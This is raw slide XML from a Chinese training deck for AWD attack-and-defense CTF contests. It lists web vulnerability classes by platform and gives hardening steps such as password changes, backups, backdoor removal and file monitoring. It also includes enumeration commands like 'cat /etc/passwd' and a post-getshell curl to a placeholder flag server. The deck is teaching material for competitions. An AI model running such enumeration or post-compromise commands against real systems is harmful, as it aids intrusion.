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1" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="304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96428" y="0"/>
            <a:ext cx="4196080" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4196080" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="6858000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4195572" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41955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4206240" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4206240" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="6858000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4206240" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42062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206240" y="0"/>
            <a:ext cx="3790315" cy="233679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3790315" h="233679">
                <a:moveTo>
                  <a:pt x="0" y="233172"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3790188" y="233172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379018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206240" y="6624828"/>
            <a:ext cx="3790315" cy="233679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3790315" h="233679">
                <a:moveTo>
                  <a:pt x="0" y="233171"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3790188" y="233171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3790188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98120" y="207263"/>
            <a:ext cx="11846052" cy="6493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24027" y="233172"/>
            <a:ext cx="11743944" cy="6391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24027" y="233172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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6391656"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="242727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4744" y="1419605"/>
            <a:ext cx="6382511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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000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82267" y="1502399"/>
            <a:ext cx="4678680" cy="4375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129271" y="1677923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0" y="451103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="449579" y="451103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449579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49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35011" y="1891283"/>
            <a:ext cx="678180" cy="680085"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="678179" h="680085">
                <a:moveTo>
                  <a:pt x="0" y="679703"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="678179" y="679703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678179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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000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6285"/>
            <a:ext cx="12191999" cy="678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24790" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000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96428" y="0"/>
            <a:ext cx="4196080" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4196080" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="6858000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4195572" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41955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4206240" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4206240" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="6858000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4206240" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42062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206240" y="0"/>
            <a:ext cx="3790315" cy="233679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3790315" h="233679">
                <a:moveTo>
                  <a:pt x="0" y="233172"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3790188" y="233172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379018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206240" y="6624828"/>
            <a:ext cx="3790315" cy="233679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3790315" h="233679">
                <a:moveTo>
                  <a:pt x="0" y="233171"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3790188" y="233171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3790188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98120" y="207263"/>
            <a:ext cx="11846052" cy="6493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24027" y="233172"/>
            <a:ext cx="11743944" cy="6391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24027" y="233172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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6391656"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="242727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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000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6285"/>
            <a:ext cx="12191999" cy="6785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24790" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944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2239" y="1907235"/>
            <a:ext cx="836752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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000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x.x.x.x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04744" y="1419605"/>
            <a:ext cx="6382511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A</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="600" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="470" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>赛前培训</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076444" y="4948415"/>
            <a:ext cx="2052827" cy="5425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50664" y="3675888"/>
            <a:ext cx="712470" cy="576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6392" y="3675888"/>
            <a:ext cx="712470" cy="576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1834" y="641222"/>
            <a:ext cx="193357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题 目 类 型 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="42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析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295" y="1591391"/>
            <a:ext cx="10228580" cy="431101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WEB：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 marR="5080">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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主要包括HTTP 协议、注入漏洞、XSS 漏洞、SSRF 漏洞、CSRF 漏洞、文件处理漏洞、访问控制漏洞、会话管理漏洞等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469900" indent="-457835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PHP网站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1、SQL注入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2、文件包含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 marR="7604760">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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3、php反序列化 </a:t>
            </a:r>
            <a:endParaRPr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 marR="7604760">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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4、任意命令执行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5、任意文件读取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6、最新cms框架漏洞</a:t>
            </a:r>
            <a:endParaRPr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5179" y="646302"/>
            <a:ext cx="1933575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题 目 类 型 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="42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析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80" y="1538605"/>
            <a:ext cx="8710295" cy="381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5" marR="5080" indent="-521335">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="52197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JAVA网站(Tomcat、Resin、Jboss、Weblogic)</a:t>
            </a:r>
            <a:endParaRPr sz="18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R="5080" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="52197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  </a:t>
            </a:r>
            <a:endParaRPr sz="18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R="5080" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="521970" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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			</a:t>
            </a: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1、命令执行（JSP一句话木马等）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2、SQL注入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 marR="368300">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285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3、条件竞争（Servlet线程不安全） </a:t>
            </a:r>
            <a:endParaRPr sz="18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 marR="368300">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285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4、SSRF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795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5、文件上传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6、代码执行（Java反射机制）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5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7、任意文件读取/目录遍历攻击</a:t>
            </a:r>
            <a:endParaRPr sz="18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46302"/>
            <a:ext cx="1933575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题 目 类 型 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="42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析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591310"/>
            <a:ext cx="8733155" cy="37655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18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Python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网站（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Django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flask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Tornado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）</a:t>
            </a:r>
            <a:endParaRPr sz="18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065" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1185"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst>
            </a:pP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1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SQL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注入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2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、模板注入 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SSTI</a:t>
            </a:r>
            <a:endParaRPr sz="180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3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、任意命令执行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5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4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、文件上传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5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、文件包含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6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、反序列化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899160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="108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7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、格式化字符串</a:t>
            </a:r>
            <a:endParaRPr sz="18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009" y="659383"/>
            <a:ext cx="1633855" cy="56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8665" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-28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G </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-24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sz="2000" b="1" spc="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t	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-3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f </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-6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l </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="1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b="1" spc="-2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g</a:t>
            </a:r>
            <a:endParaRPr sz="20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500" y="1907285"/>
            <a:ext cx="8747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一种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预留在靶机的根目录或家目录下，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getshell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后读取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内容，提交即可得分；</a:t>
            </a:r>
            <a:endParaRPr sz="18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755" y="3416300"/>
            <a:ext cx="10109835" cy="7035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另一种有专门的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0"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靶机，成功</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>getshell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后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" kern="0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通过执行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="494F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://x.x.x.x/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>,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即可从</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0"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服务器中获取</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0"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endParaRPr sz="1800" kern="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516127"/>
            <a:ext cx="1633855" cy="570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竞 赛 分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工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900" spc="-1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C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 u </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="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r </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="9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i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n 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t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="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r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 d u </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-7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c 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t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="3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i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 n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68" y="1511808"/>
            <a:ext cx="848360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486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此类比赛一般为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>多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人成队 建议成员分配：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击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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2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人：通过各种手段获取对</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>手</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-50" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-50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防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守</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-9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2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人：对自己靶机持续加固，并进行流量分析和有利信息的及时通报；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注：比赛中可能有多台靶机，也可一人维护一台，根据自己组内选手的专业情况进行 相关分配。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20065" y="580390"/>
            <a:ext cx="5892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10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233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课程目录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62520" y="2983229"/>
            <a:ext cx="259080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一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60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的概念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60680" marR="30480" indent="-323215" algn="just">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="361315" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1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二</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-40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A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="140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WD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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攻防之加固 </a:t>
            </a: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三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60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攻防之攻击 </a:t>
            </a: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四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60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攻防之脚本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695" y="693801"/>
            <a:ext cx="37293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二、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-30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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻防之</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固</a:t>
            </a:r>
            <a:endParaRPr sz="3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317" y="1566016"/>
            <a:ext cx="3055620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35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信息收集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spc="-5" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>密码修改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网站备份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spc="-5" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>数据库备份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后门查杀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可疑服务和端口关闭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255" y="1650365"/>
            <a:ext cx="2111375" cy="27806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源码审计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漏洞验证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spc="-5" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>漏洞修复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文件监控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spc="175" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="125" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="75" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>F</a:t>
            </a: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部署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12" y="36285"/>
            <a:ext cx="12045987" cy="67854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8337" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745467" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745467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4544" y="65328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信 息 收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集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50" y="1351280"/>
            <a:ext cx="1083818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前期加固阶段主办方一般提供维护靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-35" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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地址</a:t>
            </a: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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-30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ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-34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4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登录的 账户密</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5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码</a:t>
            </a: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（各个环境都是一样）。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4180" y="1907540"/>
            <a:ext cx="6944360" cy="684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8376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信 息 收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集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283335"/>
            <a:ext cx="9284335" cy="42691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420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  <a:tab pos="2158365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netstat –a	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获取端口开放情况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2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Nmap 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探测目标信息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40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uname –a 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获取系统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2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  <a:tab pos="302895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ps –ef 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或</a:t>
            </a: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ps –aux	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获取服务器运行服务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2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cat /etc/passwd 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查看可登陆用户列表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3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find . -type d -perm -002 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检查可写目录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25"/>
              </a:spcBef>
              <a:buChar char="➢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获取中间件类型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2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Web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代码语言</a:t>
            </a:r>
            <a:endParaRPr sz="2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265" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="33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find / -name index.php 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查找</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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目录</a:t>
            </a:r>
            <a:endParaRPr sz="28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4122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密 码 修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改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45" y="1401445"/>
            <a:ext cx="8961755" cy="39077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56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SSH</a:t>
            </a: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密码修改 </a:t>
            </a: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passwd </a:t>
            </a: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用户名</a:t>
            </a:r>
            <a:endParaRPr sz="2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0665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="46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200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>加固阶段网络隔离，此时只能访问自己维护的靶机环境。</a:t>
            </a:r>
            <a:endParaRPr sz="2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0665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="48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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>上来第一步修改初始</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>密码。</a:t>
            </a:r>
            <a:endParaRPr sz="2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0665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="46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200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>此操作防止网络互通后，服务器直接被敌方拿走。</a:t>
            </a:r>
            <a:endParaRPr sz="2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65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WEB</a:t>
            </a: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后台密码修改</a:t>
            </a:r>
            <a:endParaRPr sz="2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0665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="46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200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>防止别人直接登录你的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>站点后台。</a:t>
            </a:r>
            <a:endParaRPr sz="2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65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0665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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数据库密码</a:t>
            </a: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(</a:t>
            </a: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如果有权限，更改数据库密码</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr sz="2200" kern="0">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="240665" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="10000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  <a:tab pos="4138295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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m</a:t>
            </a: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ysqladmin –u</a:t>
            </a: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用户名 </a:t>
            </a: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–p</a:t>
            </a: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旧密码 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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新密码</a:t>
            </a:r>
            <a:endParaRPr sz="2200" kern="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1389" y="2922473"/>
            <a:ext cx="2024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➢"/>
              <a:tabLst>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst>
            </a:pP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了解</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="95" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>AW</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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的概念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389" y="3526663"/>
            <a:ext cx="236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➢"/>
              <a:tabLst>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst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掌握基本的加固思路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1389" y="4130167"/>
            <a:ext cx="236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➢"/>
              <a:tabLst>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst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掌握基本的攻击思路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1389" y="4733925"/>
            <a:ext cx="236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➢"/>
              <a:tabLst>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst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掌握简单的脚本书写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208" y="1299972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80" h="449580">
                <a:moveTo>
                  <a:pt x="0" y="449579"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="449580" y="449579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44958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49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948" y="1513332"/>
            <a:ext cx="678180" cy="678180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="678180" h="678180">
                <a:moveTo>
                  <a:pt x="0" y="678179"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="678180" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180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360" y="2662758"/>
            <a:ext cx="5029835" cy="318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本课程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主要讲</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>解</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="65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的竞赛模式</a:t>
            </a:r>
            <a:endParaRPr sz="1800" spc="-5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spc="-5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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="45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endParaRPr sz="1800" spc="45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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr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线下赛的加固思路</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000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45" dirty="0">
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
